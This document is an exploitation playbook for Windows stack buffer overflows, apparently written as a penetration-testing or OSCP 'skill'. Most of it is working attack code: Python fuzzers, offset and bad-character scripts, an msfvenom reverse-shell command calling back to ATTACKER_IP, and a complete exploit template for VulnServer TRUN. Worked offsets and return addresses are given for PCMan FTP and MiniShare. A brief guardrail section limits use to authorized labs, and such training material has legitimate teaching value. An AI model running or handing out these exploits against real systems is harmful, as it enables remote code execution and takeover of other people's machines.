Buffer Overflow Exploitation

Purpose

Execute systematic buffer overflow vulnerability discovery and exploitation against Windows applications to achieve remote code execution. This skill enables comprehensive fuzzing to identify crashes, determination of EIP offset, bad character identification, JMP ESP location discovery, shellcode generation, and final exploit construction for penetration testing and OSCP-style assessments.

Inputs / Prerequisites

Required Tools

• Immunity Debugger with Mona.py plugin installed
• Python 2.7 for exploit script development
• Metasploit Framework (msfvenom, pattern_create, pattern_offset)
• Netcat for reverse shell listener
• Target Windows application with known vulnerability

Environment Setup

• Windows VM with vulnerable application
• Kali Linux or attacker machine
• Network connectivity between machines
• Mona.py copied to C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands

Knowledge Requirements

• Understanding of x86 assembly and memory layout
• Familiarity with stack structure (ESP, EIP, EBP)
• Basic Python socket programming
• Understanding of shellcode encoding

Outputs / Deliverables

Primary Outputs

• Working exploit achieving remote code execution
• Reverse shell on target system
• Documented exploitation process
• Exploit template for similar vulnerabilities

Evidence Artifacts

• Crash offset documentation
• Bad character list
• JMP ESP address with module info
• Complete exploit script

Core Workflow

Phase 1: Fuzzing the Application

Create Fuzzing Script

Systematically send increasing buffer sizes to identify crash point:

#!/usr/bin/python
import socket
from time import sleep

length = 100

while True:
    try:
        print "Fuzzing with %d bytes" % length
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('TARGET_IP', TARGET_PORT))
        s.recv(1024)
        s.send('COMMAND ' + 'A' * length + '\r\n')
        s.recv(1024)
        s.close()
        sleep(1)
        length += 100
    except:
        print "Crashed at %d bytes" % length
        exit()

Monitor in Immunity Debugger

1. Attach Immunity Debugger to target process
2. Press F9 to run the application
3. Run fuzzer and note crash byte count
4. Observe EIP value (should show 41414141 for 'AAAA')

Phase 2: Finding EIP Offset

Generate Unique Pattern

Create a non-repeating pattern to identify exact offset:

# Using Metasploit
msf-pattern_create -l 2100

# Using Mona in Immunity
!mona pattern_create 2100

Pattern saved to: C:\Program Files\Immunity Inc\Immunity Debugger\pattern.txt

Send Pattern to Application

#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('TARGET_IP', TARGET_PORT))

pattern = "Aa0Aa1Aa2Aa3..."  # Full pattern from pattern_create

s.recv(1024)
s.send('COMMAND ' + pattern + '\r\n')
s.recv(1024)
s.close()

Determine Offset

After crash, note EIP value from Immunity Debugger:

# Using Metasploit
msf-pattern_offset -q 396F4338

# Using Mona
!mona pattern_offset 396F4338

Result: Exact position found (e.g., offset 2006)

Verify Offset Control

#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('TARGET_IP', TARGET_PORT))

offset = 2006
buffer = 'A' * offset + 'B' * 4 + 'C' * 400

s.recv(1024)
s.send('COMMAND ' + buffer + '\r\n')
s.recv(1024)
s.close()

Verify EIP shows 42424242 (BBBB) confirming offset control.

Phase 3: Bad Character Identification

Generate Bad Character Array

Create complete byte array for testing:

!mona bytearray

Output saved to: C:\Program Files\Immunity Inc\Immunity Debugger\bytearray.txt

Standard Bad Character Array

badchars = (
    "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
    "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
    "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
    "\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
    "\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
    "\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
    "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f"
    "\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
    "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f"
    "\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
    "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf"
    "\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
    "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf"
    "\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
    "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
    "\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

Send Bad Characters

#!/usr/bin/python
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('TARGET_IP', TARGET_PORT))

offset = 2006
buffer = 'A' * offset + 'B' * 4 + badchars

s.recv(1024)
s.send('COMMAND ' + buffer + '\r\n')
s.recv(1024)
s.close()

Analyze in Immunity

1. Right-click ESP register → Follow in Dump
2. Examine hex dump for truncated or corrupted sequences
3. Note character before corruption as bad character

Automated Bad Character Detection

# Compare memory with expected bytearray
!mona compare -f C:\Program Files\Immunity Inc\Immunity Debugger\bytearray.bin -a ESP_ADDRESS

# Generate new bytearray excluding known bad chars
!mona bytearray -cpb "\x00\x0a\x0d"

Common Bad Characters

Character	Hex	Description
NULL	\x00	String terminator
LF	\x0a	Line feed
CR	\x0d	Carriage return
Space	\x20	Whitespace delimiter

Phase 4: Finding JMP ESP

Search for JMP ESP Instruction

Locate a reliable return address to redirect execution:

# Find JMP ESP in loaded modules
!mona jmp -r esp

# Search specific module (without ASLR)
!mona find -s "\xff\xe4" -m essfunc.dll

# List modules to find suitable candidates
!mona modules

Module Selection Criteria

Choose modules with these protections DISABLED:

• ASLR: False
• Rebase: False
• SafeSEH: False
• NXCompat: False

Manual JMP ESP Search

Using nasm_shell to get opcode:

/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > JMP ESP
00000000  FFE4              jmp esp

Search in Immunity: !mona find -s "\xff\xe4" -m MODULE.dll

Convert Address to Little Endian

Found address: 0x625011AF Little endian format: \xAF\x11\x50\x62

Using struct.pack:

import struct
jmpesp = struct.pack("<I", 0x625011AF)

Phase 5: Shellcode Generation

Generate Reverse Shell Payload

msfvenom -p windows/shell_reverse_tcp \
    LHOST=ATTACKER_IP \
    LPORT=4444 \
    EXITFUNC=thread \
    -b "\x00\x0a\x0d" \
    -e x86/shikata_ga_nai \
    -f python \
    -v shellcode

Parameters Explained

Parameter	Purpose
-p	Payload type
LHOST	Attacker IP for callback
LPORT	Attacker listening port
EXITFUNC=thread	Clean exit without crashing
-b	Bad characters to avoid
-e	Encoder for obfuscation
-f python	Output format
-v shellcode	Variable name

Phase 6: Final Exploit Construction

Complete Exploit Template

#!/usr/bin/python
import socket
import struct
import sys

if len(sys.argv) < 2:
    print "\nUsage: " + sys.argv[0] + " <TARGET_IP>\n"
    sys.exit()

# Configuration
target_ip = sys.argv[1]
target_port = 9999
offset = 2006

# JMP ESP address (little endian)
jmpesp = struct.pack("<I", 0x625011AF)

# NOP sled for decoder space
nops = "\x90" * 20

# Shellcode (msfvenom output)
shellcode = (
    "\xba\xbd\x3a\xaf\xba\xd9\xf7\xd9\x74\x24\xf4"
    "\x5e\x31\xc9\xb1\x52\x31\x56\x12\x03\x56\x12"
    # ... rest of shellcode
)

# Build buffer
buffer = "A" * offset
buffer += jmpesp
buffer += nops
buffer += shellcode

# Send exploit
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_ip, target_port))
    s.recv(1024)
    s.send('TRUN .' + buffer + '\r\n')
    s.recv(1024)
    s.close()
    print "[+] Exploit sent successfully"
except:
    print "[-] Connection failed"

Execute Exploit

# Start listener on attacker
nc -lvnp 4444

# Run exploit
python2 exploit.py TARGET_IP

# Receive shell connection

Quick Reference

Mona Commands Cheatsheet

Command	Purpose
!mona pattern_create LENGTH	Create unique pattern
!mona pattern_offset EIP	Find offset position
!mona bytearray	Generate byte array
!mona bytearray -cpb "\x00"	Exclude bad chars
!mona compare -f FILE -a ADDR	Compare memory
!mona jmp -r esp	Find JMP ESP
!mona modules	List loaded modules
!mona find -s BYTES -m MODULE	Search in module

Exploitation Workflow Summary

1. Fuzz → Find crash point
2. Pattern → Determine EIP offset
3. Verify → Control EIP with known value
4. Badchars → Identify restricted bytes
5. JMP ESP → Find return address
6. Shellcode → Generate payload
7. Exploit → Combine and execute

Buffer Structure

[PADDING][EIP][NOP SLED][SHELLCODE]
   |       |      |         |
   A*N   JMP ESP  \x90*20  msfvenom output

Common Offsets Reference

Application	Command	Offset
VulnServer TRUN	TRUN .	2006
MiniShare 1.4.1	GET	1787
PCMan FTP PORT	PORT	2006
FreeFloat FTP USER	USER	230

Constraints and Guardrails

Operational Boundaries

• Test only against authorized systems and applications
• Use isolated lab environments for exploit development
• Document all testing activities and findings
• Avoid testing against production systems

Technical Limitations

• DEP (Data Execution Prevention) prevents stack execution
• ASLR randomizes module addresses each reboot
• Stack canaries detect buffer overflows
• SafeSEH restricts exception handler exploitation

Bypass Considerations

• DEP Bypass: ROP chains, ret2libc techniques
• ASLR Bypass: Information leaks, fixed modules
• Canary Bypass: Format string bugs, heap overflow

Examples

Example 1: VulnServer TRUN Exploitation

Fuzzing Result: Crash at ~2100 bytes EIP Offset: 2006 bytes Bad Characters: \x00 only JMP ESP: 0x625011AF (essfunc.dll)

Exploit:

buffer = "A" * 2006
buffer += "\xAF\x11\x50\x62"  # JMP ESP
buffer += "\x90" * 20         # NOP sled
buffer += shellcode           # Reverse shell

Example 2: PCMan FTP PORT Command

Fuzzing Result: Crash at ~2100 bytes EIP Offset: 2006 bytes Bad Characters: \x00\x0a\x0d JMP ESP: 0x75E2798D (SHELL32.dll)

Exploit Structure:

s.send("USER Anonymous\r\n")
s.recv(1024)
s.send("PASS pass\r\n")
s.recv(1024)
s.send("PORT " + buffer + "\r\n")

Example 3: MiniShare 1.4.1 HTTP GET

Fuzzing Result: Crash at ~1800 bytes EIP Offset: 1787 bytes Bad Characters: \x00\x0d JMP ESP: 0x7E6B30D7 (SHELL32.dll)

Buffer Format:

metodo_http = "GET "
buffer = "A" * 1787 + jmpesp + nops + shellcode
cabecera_http = " HTTP/1.1\r\n\r\n"
payload = metodo_http + buffer + cabecera_http

Troubleshooting

Exploit Crashes Application But No Shell

• Verify shellcode bad characters are excluded
• Increase NOP sled size for decoder space
• Check LHOST/LPORT in shellcode match listener
• Ensure EXITFUNC=thread for stable exit

EIP Not Overwritten as Expected

• Verify offset calculation is correct
• Check for additional bad characters affecting padding
• Ensure complete pattern reaches EIP position

JMP ESP Address Causes Crash

• Verify module has ASLR disabled
• Check address doesn't contain bad characters
• Confirm address valid after application restart

Shellcode Not Executing

• DEP may be enabled - check module protections
• NOP sled too short for decoder
• Bad characters corrupting shellcode
• Try different encoder or manual encoding

Application Crashes Before Shell

• EXITFUNC incorrect - try thread, process, or seh
• Shellcode size exceeds available buffer space
• Stack alignment issues - add stack adjustment